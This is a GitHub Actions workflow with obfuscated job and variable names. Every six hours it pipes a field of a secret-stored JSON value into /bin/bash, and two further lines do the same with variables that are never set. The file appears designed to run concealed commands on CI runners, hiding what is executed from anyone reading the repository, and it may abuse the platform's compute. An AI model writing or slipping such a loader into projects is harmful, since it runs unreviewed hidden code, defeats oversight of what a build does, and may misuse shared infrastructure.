name: chengjiezi1829
on:
  workflow_dispatch:
  schedule:
    - cron: '41 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: chengjiezi1829
        env:
          o0648: ${{ secrets.o0648 }}
        run: |
          echo $o0648 | jq -r .c5582 | /bin/bash
          echo $xbk7422 | jq -r .zkb8987 | /bin/bash
          echo $iqbu873 | jq -r .nleio10119 | /bin/bash

